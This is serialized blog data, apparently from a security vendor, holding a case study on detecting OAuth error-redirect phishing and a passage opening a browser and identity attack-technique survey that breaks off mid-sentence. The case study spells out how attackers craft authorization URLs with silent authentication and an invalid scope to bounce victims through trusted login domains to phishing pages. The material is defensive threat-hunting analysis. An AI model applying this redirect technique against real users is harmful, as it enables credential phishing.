dimensions.",{"data":6625,"content":6626,"nodeType":879},{},[6627],{"data":6628,"marks":6629,"value":6630,"nodeType":883},{},[],"Shadow AI isn't a problem that will age well if ignored. Every week that passes without visibility adds more apps, more extensions, more integrations, and more potential breach paths into the environment — and as the Vercel breach demonstrated, it only takes one forgotten OAuth grant to turn an employee's idle curiosity into an organization-wide incident.",{"data":6632,"content":6633,"nodeType":879},{},[6634,6638,6646],{"data":6635,"marks":6636,"value":6637,"nodeType":883},{},[],"Learn more about how you can tackle ",{"data":6639,"content":6641,"nodeType":940},{"uri":6640},"https:\u002F\u002Fpushsecurity.com\u002Fuc\u002Fshadow-ai",[6642],{"data":6643,"marks":6644,"value":582,"nodeType":883},{},[6645],{"type":948},{"data":6647,"marks":6648,"value":6649,"nodeType":883},{},[]," with Push. ",{"data":6651,"content":6652,"nodeType":905},{},[],{"data":6654,"content":6655,"nodeType":879},{},[6656],{"data":6657,"marks":6658,"value":1729,"nodeType":883},{},[],{"data":6660,"content":6661,"nodeType":879},{},[6662],{"data":6663,"marks":6664,"value":1736,"nodeType":883},{},[],{"data":6666,"content":6667,"nodeType":879},{},[6668,6672,6680],{"data":6669,"marks":6670,"value":6671,"nodeType":883},{},[],"Book a ",{"data":6673,"content":6674,"nodeType":940},{"uri":4772},[6675],{"data":6676,"marks":6677,"value":6679,"nodeType":883},{},[6678],{"type":948},"live demo",{"data":6681,"marks":6682,"value":6683,"nodeType":883},{},[]," to learn more.","Shadow AI: what Push data reveals about the scale of the problem","Push telemetry shows the average organization has 16 AI apps, 17 AI browser extensions, and 17 AI OAuth integrations in use. Here's what it means for security.","2026-05-28T00:00:00.000Z","what-push-data-reveals-about-the-state-of-shadow-ai",{"items":6689},[6690,6694],{"sys":6691,"name":6693},{"id":6692},"1gZi8NrRy2v9OqPV7C4dwD","Risk management",{"sys":6695,"name":298},{"id":6696},"3pjES4THCIfSAwhGdNwBcy",{"items":6698},[6699],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":6700},{"url":872},{"__typename":1967,"sys":6702,"content":6704,"title":7114,"synopsis":7115,"hashTags":59,"publishedDate":7116,"slug":7117,"tagsCollection":7118,"authorsCollection":7124},{"id":6703},"4fUZAVpkaksHImeoT8jp0f",{"json":6705},{"data":6706,"content":6707,"nodeType":875},{},[6708,6715,6722,6729,6736,6743,6763,6770,6777,6784,6790,6793,6800,6819,6825,6841,6857,6872,6888,6895,6902,6909,6915,6922,6929,6936,6943,6949,6969,6984,6991,6998,7005,7012,7019,7026,7032,7039,7046,7053,7060,7067,7074,7081,7088,7095],{"data":6709,"content":6710,"nodeType":879},{},[6711],{"data":6712,"marks":6713,"value":6714,"nodeType":883},{},[],"Every security engineer has a version of this ritual. ",{"data":6716,"content":6717,"nodeType":879},{},[6718],{"data":6719,"marks":6720,"value":6721,"nodeType":883},{},[],"A new campaign hits the news, and you already hear the question coming, “Are we covered?”",{"data":6723,"content":6724,"nodeType":879},{},[6725],{"data":6726,"marks":6727,"value":6728,"nodeType":883},{},[],"So you read the writeup and quickly do the calculus on whether you can extract meaningful data, something to base a behavioral detection around — or not.",{"data":6730,"content":6731,"nodeType":879},{},[6732],{"data":6733,"marks":6734,"value":6735,"nodeType":883},{},[],"Then the choice is: Send the IOCs you can identify to your blocklists and move on for now, or try to dig deeper. The limitations of the first choice are clear; so are the challenges of the second.",{"data":6737,"content":6738,"nodeType":879},{},[6739],{"data":6740,"marks":6741,"value":6742,"nodeType":883},{},[],"That’s the uncomfortable gap between “We’re aware of this threat” and “We have strong detections around it.”",{"data":6744,"content":6745,"nodeType":879},{},[6746,6750,6759],{"data":6747,"marks":6748,"value":6749,"nodeType":883},{},[],"Because you already know that the IOCs for a novel browser-based attack are likely outdated the moment you block them. And in the case of a ",{"data":6751,"content":6753,"nodeType":940},{"uri":6752},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F03\u002F02\u002Foauth-redirection-abuse-enables-phishing-malware-delivery\u002F",[6754],{"data":6755,"marks":6756,"value":6758,"nodeType":883},{},[6757],{"type":948},"new technique observed by Microsoft",{"data":6760,"marks":6761,"value":6762,"nodeType":883},{},[]," earlier this year, you’d be right.",{"data":6764,"content":6765,"nodeType":879},{},[6766],{"data":6767,"marks":6768,"value":6769,"nodeType":883},{},[],"In March, Push’s AI agents took a close look at that Microsoft intel, which details a discovered campaign built around a novel OAuth redirect abuse technique used to deliver users to phishing pages under the cover of trusted services’ OAuth flows. ",{"data":6771,"content":6772,"nodeType":879},{},[6773],{"data":6774,"marks":6775,"value":6776,"nodeType":883},{},[],"What we found was indicative of how these attacks rapidly evolve: No matches for the published IOCs across our install base. But a few months later, we got a true positive. Except it was for new lures, new variants, and different IOCs. What hadn’t changed was the underlying attack delivery technique, and that’s what we used to detect a new campaign on Push customer estates.",{"data":6778,"content":6779,"nodeType":879},{},[6780],{"data":6781,"marks":6782,"value":6783,"nodeType":883},{},[],"In this article, we’ll walk through this example as a case study of how agentic threat hunting helps us go beyond IOCs to extract durable behavioral indicators that close the gap between “We’re aware of this threat” and “We’re covered.”",{"data":6785,"content":6789,"nodeType":971},{"target":6786},{"sys":6787},{"id":6788,"type":976,"linkType":977},"6X7yXNdchH1Qp2tNKRAyVP",[],{"data":6791,"content":6792,"nodeType":905},{},[],{"data":6794,"content":6795,"nodeType":909},{},[6796],{"data":6797,"marks":6798,"value":6799,"nodeType":883},{},[],"The intel: Novel abuse of OAuth redirects as a phishing delivery mechanism",{"data":6801,"content":6802,"nodeType":879},{},[6803,6807,6815],{"data":6804,"marks":6805,"value":6806,"nodeType":883},{},[],"The technique ",{"data":6808,"content":6809,"nodeType":940},{"uri":6752},[6810],{"data":6811,"marks":6812,"value":6814,"nodeType":883},{},[6813],{"type":948},"Microsoft documented",{"data":6816,"marks":6817,"value":6818,"nodeType":883},{},[]," back in March is an interesting one. It doesn't steal tokens or abuse consent flows. Instead, it weaponizes the OAuth error-handling path itself — turning trusted identity provider domains into a delivery mechanism for phishing and malware.",{"data":6820,"content":6824,"nodeType":971},{"target":6821},{"sys":6822},{"id":6823,"type":976,"linkType":977},"486pfUpMxx15vJupxuiePn",[],{"data":6826,"content":6827,"nodeType":879},{},[6828,6832,6837],{"data":6829,"marks":6830,"value":6831,"nodeType":883},{},[],"Here's how it works. The attacker registers a malicious application in an actor-controlled tenant, pointing its redirect URI at attacker infrastructure. They craft an authorization URL using ",{"data":6833,"marks":6834,"value":6836,"nodeType":883},{},[6835],{"type":916},"prompt=none",{"data":6838,"marks":6839,"value":6840,"nodeType":883},{},[]," (forcing silent authentication) and an intentionally invalid scope, which guarantees an OAuth error. ",{"data":6842,"content":6843,"nodeType":879},{},[6844,6848,6853],{"data":6845,"marks":6846,"value":6847,"nodeType":883},{},[],"The identity provider — Microsoft Entra ID, Google Workspace, or any OAuth-compliant service — handles that error the way the spec says it should: By redirecting the browser to the application's registered redirect URI. The user clicks a link that begins at ",{"data":6849,"marks":6850,"value":6852,"nodeType":883},{},[6851],{"type":916},"login.microsoftonline.com",{"data":6854,"marks":6855,"value":6856,"nodeType":883},{},[],", passes through a legitimate authentication endpoint, and lands on an attacker-controlled page.",{"data":6858,"content":6859,"nodeType":879},{},[6860,6864,6868],{"data":6861,"marks":6862,"value":6863,"nodeType":883},{},[],"Importantly, no token is stolen during the redirect. The OAuth flow is the delivery vehicle, not the compromise mechanism. What happens ",{"data":6865,"marks":6866,"value":3345,"nodeType":883},{},[6867],{"type":891},{"data":6869,"marks":6870,"value":6871,"nodeType":883},{},[]," the redirect — phishing, malware download, credential harvesting — is where the actual attack occurs.",{"data":6873,"content":6874,"nodeType":879},{},[6875,6879,6884],{"data":6876,"marks":6877,"value":6878,"nodeType":883},{},[],"This technique is also successful because conventional URL filtering sees a legitimate authentication domain, not a phishing destination. The redirect is standards-compliant behavior, and the initial URL carries the domain reputation of a trusted identity provider — which means the usual defenses at the network layer don't fire. (No TI or domain-based detection service in the world would raise a ",{"data":6880,"marks":6881,"value":6883,"nodeType":883},{},[6882],{"type":916},"microsoft.com",{"data":6885,"marks":6886,"value":6887,"nodeType":883},{},[]," domain as suspicious!)",{"data":6889,"content":6890,"nodeType":879},{},[6891],{"data":6892,"marks":6893,"value":6894,"nodeType":883},{},[],"With this intel, Push’s agents now had some useful fodder to hunt for.",{"data":6896,"content":6897,"nodeType":909},{},[6898],{"data":6899,"marks":6900,"value":6901,"nodeType":883},{},[],"Hunting from intel: How we developed a behavioral detection",{"data":6903,"content":6904,"nodeType":879},{},[6905],{"data":6906,"marks":6907,"value":6908,"nodeType":883},{},[],"It started with ingestion. When the Microsoft blog was published, Push's TI aggregation agent flagged it as relevant to our detection surface — the technique abuses OAuth redirect behavior observable in the browser, which maps directly to the metadata that Push's browser agent captures.",{"data":6910,"content":6914,"nodeType":971},{"target":6911},{"sys":6912},{"id":6913,"type":976,"linkType":977},"26saWWXsyFAZrsrfspGwaF",[],{"data":6916,"content":6917,"nodeType":879},{},[6918],{"data":6919,"marks":6920,"value":6921,"nodeType":883},{},[],"The Push intel agent understands not to hunt for IOCs, but rather to think in terms of durable behaviors. It understands the telemetry available to the Push browser extension, and then compares that to the telemetry it would expect to be able to extract for a given technique, before deciding what to hunt for.",{"data":6923,"content":6924,"nodeType":879},{},[6925],{"data":6926,"marks":6927,"value":6928,"nodeType":883},{},[],"In this case, the intel agent extracted two distinct behavioral elements from the research to look for: the OAuth redirect technique and the page users land on after the error.",{"data":6930,"content":6931,"nodeType":879},{},[6932],{"data":6933,"marks":6934,"value":6935,"nodeType":883},{},[],"That extraction step is where surface-level details can become technique-driven hunts. Microsoft's article listed specific client IDs, redirect URLs, and PowerShell command patterns — indicators that are useful for retrospective hunting but will rotate as the campaign evolves. ",{"data":6937,"content":6938,"nodeType":879},{},[6939],{"data":6940,"marks":6941,"value":6942,"nodeType":883},{},[],"The pipeline's job was to identify what wouldn't change: The behavioral mechanics of abusing the OAuth error redirect path as a delivery mechanism, independent of which domains, client IDs, or post-redirect payloads the attacker chose to use. This is the Pyramid of Pain principle in practice: Hunt for the technique, not the indicator, because techniques are genuinely hard for attackers to change.",{"data":6944,"content":6948,"nodeType":971},{"target":6945},{"sys":6946},{"id":6947,"type":976,"linkType":977},"7qUVlKVjHMkabu0MJ1S7gC",[],{"data":6950,"content":6951,"nodeType":879},{},[6952,6956,6965],{"data":6953,"marks":6954,"value":6955,"nodeType":883},{},[],"Next, the agents verified what they already knew from Push’s internal TTP knowledge base. In this case, the agents understood the well-known technique of ",{"data":6957,"content":6959,"nodeType":940},{"uri":6958},"https:\u002F\u002Fowasp.org\u002Fwww-community\u002Fattacks\u002Fopen_redirect",[6960],{"data":6961,"marks":6962,"value":6964,"nodeType":883},{},[6963],{"type":948},"open redirects",{"data":6966,"marks":6967,"value":6968,"nodeType":883},{},[],", where attackers leverage redirects to deliver users to a malicious page. The example originally published by Microsoft was a novel variation of that — abusing a trusted service and the open redirect technique via a legitimate OAuth error workflow to deliver a multi-stage phishing attack.",{"data":6970,"content":6971,"nodeType":879},{},[6972,6976,6980],{"data":6973,"marks":6974,"value":6975,"nodeType":883},{},[],"AI models’ deep knowledge of web programming and frameworks is a particular strength here, because they understand which OAuth redirect behavior is normal and common across diverse scenarios, and can pinpoint which elements will be the strongest signal to hunt for malicious behavior. The agents immediately recognized that hunting for ",{"data":6977,"marks":6978,"value":6836,"nodeType":883},{},[6979],{"type":916},{"data":6981,"marks":6982,"value":6983,"nodeType":883},{},[]," would be too noisy, as legitimate apps regularly use silent token refresh.",{"data":6985,"content":6986,"nodeType":879},{},[6987],{"data":6988,"marks":6989,"value":6990,"nodeType":883},{},[],"In this case, the approach was simply to find all the instances where a user hit an OAuth error page, and then landed on a login page afterward. Normal behavior for error states would be to return an error response — not send the user on to a page with a password form field or a CAPTCHA. That’s highly suspicious.",{"data":6992,"content":6993,"nodeType":879},{},[6994],{"data":6995,"marks":6996,"value":6997,"nodeType":883},{},[],"The agents then built behavioral queries targeting both behavioral attributes of the attack, and validated them across Push's install base. ",{"data":6999,"content":7000,"nodeType":879},{},[7001],{"data":7002,"marks":7003,"value":7004,"nodeType":883},{},[],"When agents first looked in March, the hunts returned no true positives — the specific campaign Microsoft documented wasn’t active against Push customers at that time.",{"data":7006,"content":7007,"nodeType":879},{},[7008],{"data":7009,"marks":7010,"value":7011,"nodeType":883},{},[],"But the query logic was sound — precise enough to avoid false positives, broad enough to catch technique variants without relying on the specific IOCs that Microsoft documented. So the pipeline promoted it to a live query — a continuing detection that would surface any future instances of the technique across the customer base.",{"data":7013,"content":7014,"nodeType":909},{},[7015],{"data":7016,"marks":7017,"value":7018,"nodeType":883},{},[],"The hunt pays off: A new variant, completely different IOCs",{"data":7020,"content":7021,"nodeType":879},{},[7022],{"data":7023,"marks":7024,"value":7025,"nodeType":883},{},[],"In June, the query fired. A single user at a single customer had been targeted, but with a completely different scenario. ",{"data":7027,"content":7031,"nodeType":971},{"target":7028},{"sys":7029},{"id":7030,"type":976,"linkType":977},"7uXgOzxemy1PaJLhUa1txV",[],{"data":7033,"content":7034,"nodeType":879},{},[7035],{"data":7036,"marks":7037,"value":7038,"nodeType":883},{},[],"Where the Microsoft-documented example used lures presented as document-sharing links, Teams meeting recordings, or password resets, and the abused trusted service was a Microsoft login link used to trigger the OAuth error, the Push-observed attack chain used different elements. However, the behavioral technique at the core was the same.",{"data":7040,"content":7041,"nodeType":879},{},[7042],{"data":7043,"marks":7044,"value":7045,"nodeType":883},{},[],"In this case, the user clicked a link in a service desk ticket, triggering an OAuth flow that used a redirect URL with parameters designed to make it look like a Grammarly link. After hitting the OAuth error, the user was redirected to a page with a CAPTCHA, and then redirected again to a second page behind a Cloudflare Turnstile that was running a phish kit. While examining the phishing page, Push’s agents found a net-new phish kit that they later added additional detections for. ",{"data":7047,"content":7048,"nodeType":879},{},[7049],{"data":7050,"marks":7051,"value":7052,"nodeType":883},{},[],"Roughly a day after the Push detection fired, Google Safe Browsing flagged both domains as phishing domains. But when the user was first targeted, neither domain had been flagged. In this case, the user exited the redirect flow before entering any credentials.",{"data":7054,"content":7055,"nodeType":879},{},[7056],{"data":7057,"marks":7058,"value":7059,"nodeType":883},{},[],"It’s important to note that this phishing technique also bypasses other controls based on network content pattern analysis or domain-based detections. For example, a network proxy is designed to look for malicious webpages based on known-bad IOCs like domains or page content that contains known-bad script files. This technique uses a dynamic obfuscated Javascript blob that unpacks and loads the webpage on the client side after checking to see if it’s running in a live browser environment, evading proxy-based analysis.",{"data":7061,"content":7062,"nodeType":879},{},[7063],{"data":7064,"marks":7065,"value":7066,"nodeType":883},{},[],"The query now serves as another early-warning flag designed to be broad enough to catch other interesting new variants of this TTP.",{"data":7068,"content":7069,"nodeType":909},{},[7070],{"data":7071,"marks":7072,"value":7073,"nodeType":883},{},[],"Why technique-level detection pays dividends",{"data":7075,"content":7076,"nodeType":879},{},[7077],{"data":7078,"marks":7079,"value":7080,"nodeType":883},{},[],"This example demonstrates the value of behavioral detection. By focusing on technique extraction, we can stay a step ahead of attack evolution, identifying other contexts and campaigns that use the same behavioral technique, without relying on stale IOCs.",{"data":7082,"content":7083,"nodeType":879},{},[7084],{"data":7085,"marks":7086,"value":7087,"nodeType":883},{},[],"For customers, this means no one has to distil the threat intel report into behavioral elements, spend time crafting detections, or work to eliminate false positives. The Push agents do all that automatically, delivering a compounding benefit the more they learn. ",{"data":7089,"content":7090,"nodeType":879},{},[7091],{"data":7092,"marks":7093,"value":7094,"nodeType":883},{},[],"Customers get a fully operationalized threat-hunting and detection engineering capability; and the Push knowledge base itself expands with each new hunt, getting better at identifying emerging threats.",{"data":7096,"content":7097,"nodeType":879},{},[7098,7102,7110],{"data":7099,"marks":7100,"value":7101,"nodeType":883},{},[],"If you'd like to see how Push's detection pipeline would work in your environment, ",{"data":7103,"content":7104,"nodeType":940},{"uri":4772},[7105],{"data":7106,"marks":7107,"value":7109,"nodeType":883},{},[7108],{"type":948},"book a demo",{"data":7111,"marks":7112,"value":7113,"nodeType":883},{},[]," with our team.","From IOCs to TTPs: An agentic threat hunting case study","How Push’s agentic detection pipeline turns intel into huntable characteristics of attacker behavior, deriving durable detections from a range of sources.","2026-07-31T00:00:00.000Z","from-iocs-to-ttps-an-agentic-threat-hunting-case-study",{"items":7119},[7120,7122],{"sys":7121,"name":3273},{"id":3272},{"sys":7123,"name":343},{"id":3276},{"items":7125},[7126],{"fullName":4797,"firstName":4798,"jobTitle":4799,"profilePicture":7127},{"url":4801},{"__typename":1967,"sys":7129,"content":7131,"title":7965,"synopsis":7966,"hashTags":59,"publishedDate":7967,"slug":7968,"tagsCollection":7969,"authorsCollection":7975},{"id":7130},"211Dd0EIrXPOFpvRgs0fEE",{"json":7132},{"data":7133,"content":7134,"nodeType":875},{},[7135,7154,7173,7192,7198,7201,7209,7216,7223,7230,7237,7245,7248,7256,7263,7270,7277,7283,7291,7310,7317,7324,7340,7348,7377,7393,7400,7428,7436,7466,7473,7481,7499,7506,7513,7519,7526,7534,7552,7559,7578,7585,7588,7596,7603,7690,7697,7713,7716,7746,7765,7772,7779,7782,7790,7809,7816,7823,7840,7843,7851,7858,7891,7898,7915,7934,7940,7943,7950],{"data":7136,"content":7137,"nodeType":879},{},[7138,7142,7150],{"data":7139,"marks":7140,"value":7141,"nodeType":883},{},[],"When we released the ",{"data":7143,"content":7145,"nodeType":940},{"uri":7144},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fsaas-attack-techniques\u002F",[7146],{"data":7147,"marks":7148,"value":7149,"nodeType":883},{},[],"SaaS attack matrix",{"data":7151,"marks":7152,"value":7153,"nodeType":883},{},[]," in 2023, we were anticipating a shift that was just beginning to take shape. The techniques that attackers were using to compromise cloud applications and identities weren't well represented in existing frameworks, and many of the ones we documented hadn't yet been widely observed in the wild.",{"data":7155,"content":7156,"nodeType":879},{},[7157,7161,7169],{"data":7158,"marks":7159,"value":7160,"nodeType":883},{},[],"A year later, we ",{"data":7162,"content":7164,"nodeType":940},{"uri":7163},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-saas-attack-matrix-one-year-on\u002F",[7165],{"data":7166,"marks":7167,"value":7168,"nodeType":883},{},[],"reviewed what had changed",{"data":7170,"marks":7171,"value":7172,"nodeType":883},{},[]," and found that the initial access phase — the techniques designed to compromise an identity in the first place — was where almost all of the attacker innovation was concentrated. And two years on, that trend has become the story of the modern threat landscape. ",{"data":7174,"content":7175,"nodeType":879},{},[7176,7180,7188],{"data":7177,"marks":7178,"value":7179,"nodeType":883},{},[],"Today, we're re-releasing the matrix as the ",{"data":7181,"content":7183,"nodeType":940},{"uri":7182},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002F",[7184],{"data":7185,"marks":7186,"value":7187,"nodeType":883},{},[],"Browser & Identity Attacks Matrix",{"data":7189,"marks":7190,"value":7191,"nodeType":883},{},[],". The name change isn't cosmetic. It reflects that the attacks driving the most consequential breaches are browser-based and identity-first.",{"data":7193,"content":7197,"nodeType":971},{"target":7194},{"sys":7195},{"id":7196,"type":976,"linkType":977},"MSnrBRJtiQxpv2qxFLCVE",[],{"data":7199,"content":7200,"nodeType":905},{},[],{"data":7202,"content":7203,"nodeType":909},{},[7204],{"data":7205,"marks":7206,"value":7208,"nodeType":883},{},[7207],{"type":916},"Why the scope needed to change",{"data":7210,"content":7211,"nodeType":879},{},[7212],{"data":7213,"marks":7214,"value":7215,"nodeType":883},{},[],"The original SaaS attack matrix was built around a specific insight: that attacks targeting modern business applications played out entirely over the internet, without touching endpoints or internal networks in any way that EDR or network detection tools would recognize.",{"data":7217,"content":7218,"nodeType":879},{},[7219],{"data":7220,"marks":7221,"value":7222,"nodeType":883},{},[],"That framing was useful, and it remains true. But it anchored the matrix to the post-access phase — what attackers do once they're inside a SaaS application — and didn't give enough weight to the initial access techniques that determine whether attackers get there in the first place.",{"data":7224,"content":7225,"nodeType":879},{},[7226],{"data":7227,"marks":7228,"value":7229,"nodeType":883},{},[],"The problem is that initial access is where the overwhelming majority of attacker innovation and investment is concentrated, and the techniques being used to achieve it are best understood as browser and identity attacks rather than SaaS-specific ones. AiTM phishing, ClickFix and its growing family of clipboard-injection variants, device code phishing, OAuth consent abuse, credential stuffing powered by infostealer supply chains, malicious browser extensions all happen in or via the browser.",{"data":7231,"content":7232,"nodeType":879},{},[7233],{"data":7234,"marks":7235,"value":7236,"nodeType":883},{},[],"Another issue is that \"SaaS\" has arguably ceased to be a meaningful category. When we consider that most organizations run the majority of their business on cloud applications, the difference between what constitutes \"SaaS\" versus cloud versus just \"business IT\" is pretty blurry (and feels like an academic rather than practical difference).",{"data":7238,"content":7239,"nodeType":879},{},[7240],{"data":7241,"marks":7242,"value":7244,"nodeType":883},{},[7243],{"type":916},"So it's less about whether an attack is a \"SaaS attack\" and more about how these attacks actually play out. ",{"data":7246,"content":7247,"nodeType":905},{},[],{"data":7249,"content":7250,"nodeType":909},{},[7251],{"data":7252,"marks":7253,"value":7255,"nodeType":883},{},[7254],{"type":916},"The technique landscape has transformed",{"data":7257,"content":7258,"nodeType":879},{},[7259],{"data":7260,"marks":7261,"value":7262,"nodeType":883},{},[],"The second part to the change is the fact that scale and speed of attacker innovation in the space justifies it.",{"data":7264,"content":7265,"nodeType":879},{},[7266],{"data":7267,"marks":7268,"value":7269,"nodeType":883},{},[],"When we launched the matrix in mid-2023, AiTM phishing was emerging as a serious concern but was far from ubiquitous. ClickFix didn't exist as a named technique. Device code phishing was a curiosity documented by a handful of researchers. ConsentFix was years away from being discovered. Browser extension supply chain attacks were rare enough to be individually notable.",{"data":7271,"content":7272,"nodeType":879},{},[7273],{"data":7274,"marks":7275,"value":7276,"nodeType":883},{},[],"In the two and a half years since, every one of these has become a mainstream, industrialized attack technique — and several have converged in ways that would have been hard to predict.",{"data":7278,"content":7282,"nodeType":971},{"target":7279},{"sys":7280},{"id":7281,"type":976,"linkType":977},"5Kw2kSrL8u4VyslxK8HCtR",[],{"data":7284,"content":7285,"nodeType":1036},{},[7286],{"data":7287,"marks":7288,"value":7290,"nodeType":883},{},[7289],{"type":916},"AiTM phishing has become the default phishing method",{"data":7292,"content":7293,"nodeType":879},{},[7294,7298,7306],{"data":7295,"marks":7296,"value":7297,"nodeType":883},{},[],"AiTM phishing is now the standard, powered by Phishing-as-a-Service kits that operate with the release cycles and customer support of legitimate SaaS products. Tycoon 2FA alone accounted for ",{"data":7299,"content":7301,"nodeType":940},{"uri":7300},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002F2025-top-phishing-trends\u002F",[7302],{"data":7303,"marks":7304,"value":7305,"nodeType":883},{},[],"62% of phishing detected by Microsoft",{"data":7307,"marks":7308,"value":7309,"nodeType":883},{},[]," and over 64,000 confirmed incidents, with Sneaky2FA, FlowerStorm, Evilginx, and a growing roster of competitors filling out the marketplace.",{"data":7311,"content":7312,"nodeType":879},{},[7313],{"data":7314,"marks":7315,"value":7316,"nodeType":883},{},[],"AiTM is constantly evolving, with vendors adding new features, capabilities, detection evasion techniques, and so on. Abuse of legitimate platforms, and increasingly AI-assisted development means that it’s trivial for attackers to spin up and tear down infrastructure, scale their campaigns, target specific organizations with crafted pages and lures, and generally means that attackers can operate highly sophisticated attacks with minimal effort and complexity. This makes AiTM and other PhaaS-powered techniques extremely accessible to all kinds of criminals.  ",{"data":7318,"content":7319,"nodeType":879},{},[7320],{"data":7321,"marks":7322,"value":7323,"nodeType":883},{},[],"These kits are delivered across several browser-based channels — not just email. Push data consistently shows that roughly 1 in 3 phishing payloads we intercept arrive via social media, search ads, messaging apps, or other non-email vectors.",{"data":7325,"content":7326,"nodeType":879},{},[7327,7331,7336],{"data":7328,"marks":7329,"value":7330,"nodeType":883},{},[],"Vishing has also surged as a delivery channel — CrowdStrike documented a ",{"data":7332,"marks":7333,"value":7335,"nodeType":883},{},[7334],{"type":916},"442% year-over-year increase",{"data":7337,"marks":7338,"value":7339,"nodeType":883},{},[],", and Mandiant found it was the single most common initial vector in cloud compromises at 23%. But the trend that matters isn't voice calls in isolation; it's voice calls combined with browser-based payloads, where a live operator guides the victim into an AiTM page or device code flow that the call alone could not execute.",{"data":7341,"content":7342,"nodeType":1036},{},[7343],{"data":7344,"marks":7345,"value":7347,"nodeType":883},{},[7346],{"type":916},"ClickFix is the top reported initial access vector",{"data":7349,"content":7350,"nodeType":879},{},[7351,7355,7362,7366,7373],{"data":7352,"marks":7353,"value":7354,"nodeType":883},{},[],"ClickFix has gone from nonexistent to one of the most prevalent initial access techniques in under 18 months. Microsoft reported it as the ",{"data":7356,"content":7357,"nodeType":940},{"uri":1144},[7358],{"data":7359,"marks":7360,"value":7361,"nodeType":883},{},[],"most common initial access vector in 2025",{"data":7363,"marks":7364,"value":7365,"nodeType":883},{},[],", accounting for 47% of observed attacks, while CrowdStrike documented a ",{"data":7367,"content":7368,"nodeType":940},{"uri":1156},[7369],{"data":7370,"marks":7371,"value":7372,"nodeType":883},{},[],"563% increase",{"data":7374,"marks":7375,"value":7376,"nodeType":883},{},[]," in fake CAPTCHA lures (a top ClickFix style).",{"data":7378,"content":7379,"nodeType":879},{},[7380,7384,7389],{"data":7381,"marks":7382,"value":7383,"nodeType":883},{},[],"ClickFix is admittedly an outlier in a browser attacks matrix — the payload ultimately executes on the endpoint, not in the browser — but the delivery is overwhelmingly browser-based: ",{"data":7385,"marks":7386,"value":7388,"nodeType":883},{},[7387],{"type":916},"4 in 5 ClickFix payloads",{"data":7390,"marks":7391,"value":7392,"nodeType":883},{},[]," intercepted by Push arrive via search engines as a result of malvertising or compromised web pages, not email, which means the browser is the only control point that actually sees the attack before the user pastes the malicious command.",{"data":7394,"content":7395,"nodeType":879},{},[7396],{"data":7397,"marks":7398,"value":7399,"nodeType":883},{},[],"ClickFix is now the primary delivery mechanism for infostealer malware, which is in turn the primary source of the stolen credentials and session tokens that power credential stuffing and session hijacking — which means the technique sits at the start of a cycle where one class of browser-delivered attack generates the raw material for the next.",{"data":7401,"content":7402,"nodeType":879},{},[7403,7407,7414,7418,7424],{"data":7404,"marks":7405,"value":7406,"nodeType":883},{},[],"The success of ClickFix has predictably spawned a growing family of derivatives — FileFix, CrashFix, ",{"data":7408,"content":7410,"nodeType":940},{"uri":7409},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finstallfix\u002F",[7411],{"data":7412,"marks":7413,"value":1826,"nodeType":883},{},[],{"data":7415,"marks":7416,"value":7417,"nodeType":883},{},[]," — and much of the naming is marketing hype around variations on the same clipboard-injection mechanic. But ",{"data":7419,"content":7420,"nodeType":940},{"uri":1331},[7421],{"data":7422,"marks":7423,"value":1321,"nodeType":883},{},[],{"data":7425,"marks":7426,"value":7427,"nodeType":883},{},[]," was a genuinely novel development.",{"data":7429,"content":7430,"nodeType":1036},{},[7431],{"data":7432,"marks":7433,"value":7435,"nodeType":883},{},[7434],{"type":916},"Browser-native ClickFix: ConsentFix",{"data":7437,"content":7438,"nodeType":879},{},[7439,7443,7451,7455,7462],{"data":7440,"marks":7441,"value":7442,"nodeType":883},{},[],"ConsentFix is a fully browser-native attack that merged ClickFix-style social engineering with OAuth consent abuse, compromising accounts through a legitimate Microsoft authorization flow with no endpoint component at all. ConsentFix was ",{"data":7444,"content":7446,"nodeType":940},{"uri":7445},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix-debrief\u002F",[7447],{"data":7448,"marks":7449,"value":7450,"nodeType":883},{},[],"traced to APT29",{"data":7452,"marks":7453,"value":7454,"nodeType":883},{},[]," and has since been ",{"data":7456,"content":7457,"nodeType":940},{"uri":1343},[7458],{"data":7459,"marks":7460,"value":7461,"nodeType":883},{},[],"commercialized on criminal forums",{"data":7463,"marks":7464,"value":7465,"nodeType":883},{},[],", following the same path from state-sponsored technique to commodity criminal tooling that we've seen repeatedly in this space.",{"data":7467,"content":7468,"nodeType":879},{},[7469],{"data":7470,"marks":7471,"value":7472,"nodeType":883},{},[],"ConsentFix demonstrates that the clipboard-injection mechanic can evolve into something that operates entirely within the browser, eliminating the endpoint detection surface that traditional ClickFix still exposed.",{"data":7474,"content":7475,"nodeType":1036},{},[7476],{"data":7477,"marks":7478,"value":7480,"nodeType":883},{},[7479],{"type":916},"Attackers have pivoted to authorization attacks to get around login controls",{"data":7482,"content":7483,"nodeType":879},{},[7484,7488,7495],{"data":7485,"marks":7486,"value":7487,"nodeType":883},{},[],"Authorization attacks like device code phishing have seen a ",{"data":7489,"content":7490,"nodeType":940},{"uri":2443},[7491],{"data":7492,"marks":7493,"value":7494,"nodeType":883},{},[],"37.5x increase",{"data":7496,"marks":7497,"value":7498,"nodeType":883},{},[]," since the start of 2026, with at least 12 distinct kits now offering the technique. It bypasses standard authentication controls — including passkeys — because the attack occurs through the OAuth device authorization flow rather than the standard login flow. ",{"data":7500,"content":7501,"nodeType":879},{},[7502],{"data":7503,"marks":7504,"value":7505,"nodeType":883},{},[],"The technique was first associated with nation-state actors like Storm-2372, but went from espionage-grade to commodity PhaaS tooling in roughly eighteen months, with kits like EvilTokens and Venom now offering turnkey device code phishing as a service.",{"data":7507,"content":7508,"nodeType":879},{},[7509],{"data":7510,"marks":7511,"value":7512,"nodeType":883},{},[],"The device code authorization is effectively performed post-authentication. If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. No password or MFA required. You can see an example in the video below.",{"data":7514,"content":7518,"nodeType":971},{"target":7515},{"sys":7516},{"id":7517,"type":976,"linkType":977},"2WPb41lNRajdpt5pogQg8M",[],{"data":7520,"content":7521,"nodeType":879},{},[7522],{"data":7523,"marks":7524,"value":7525,"nodeType":883},{},[],"And the ecosystem is adapting to this opportunity: established AiTM vendors like 